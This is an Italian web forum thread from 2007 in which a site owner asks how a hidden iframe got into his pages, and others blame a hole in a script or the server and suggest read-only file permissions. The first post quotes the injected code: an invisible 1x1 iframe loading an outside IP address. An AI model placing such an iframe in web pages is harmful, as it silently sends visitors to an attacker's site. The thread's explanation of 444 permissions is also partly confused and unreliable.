Virus su una pagina internet di un mio sito

**brutusin** · 29-04-2007, 18:01

salve a tutti ho notato che c'è un tentativo di redirect ad un sito (che non ho visitato) !
il problema è che il sito in questione è mio e io ovviamente non ho mai inserito quella porzione di codice...
il codice in questione è un'iframe nascosto che fa un redirect ad un sito
<iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>

ma come può essere successo che il codice compaia in alcune delle mie pagine ?
io solo ho accesso al server via ftp !

**Phantom** · 30-04-2007, 09:06

Basta che trovino un buco da qualche parte ( di uno script per esempio ) e modificano il contenuto. Soluzione : chmod 444 pagina.html / php

Bye

**brutusin** · 30-04-2007, 09:33

ma cosi facendo imposto i permessi su "Permesso di lettura (r)"
non è un problema se la pagina è una pagina che accede ad un db ?

**Phantom** · 30-04-2007, 13:03

No, non è un problema. il 444 permette solo all'owner di modificare la pagina, il 644 anche al nobody. chi entra entra come nobody quindi lo blocchi. Le pagine dinamiche non vengono scritte ma leggono il contenuto del db e lo estrapolano sul browser. il codice della pagina non varia. Varia quello che il browser legge

Bye

**brutusin** · 30-04-2007, 17:00

speravo si potessero modificare i paramtri con il semplice client ftp ma non si riesce a cambiare nulla !
che sia un problema di permessi sul server ?

**Phantom** · 30-04-2007, 20:23

Se non riesci da ftp fallo da file manager ( se l'hai ) oppure da telnet / ssh ( se li hai abilitati )

Bye

**Nkosi** · 02-05-2007, 17:25

Originariamente inviato da Phantom
Se non riesci da ftp fallo da file manager ( se l'hai ) oppure da telnet / ssh ( se li hai abilitati )

Bye

In pratica posso settare a 444 tutto il sito? è un operazione da fare file per file o si può anche con un solo comando? per esempio usando Fetch seleziono tutti i file (cartelle comprese) e poi sparo il 444? Si può?

**BilloKenobi** · 02-05-2007, 17:40

non serve per aiutarti a risolvere, ma se vuoi fare una lettura interessante riguardo il tuo problema

http://www.suspectfile.com/blog/?postid=27

**brutusin** · 02-05-2007, 18:27

ottima risorsa il problema è capire come possano inserire il codice in una pagina !

**BilloKenobi** · 02-05-2007, 18:29

un buco nel server o nel sito, e il gioco è fatto. comunque, anche il sito di roberto vecchioni è stato interessato da un problema simile

Discussione: Virus su una pagina internet di un mio sito

Strumenti discussione

Ricerca discussione

Visualizza

Virus su una pagina internet di un mio sito

Permessi di invio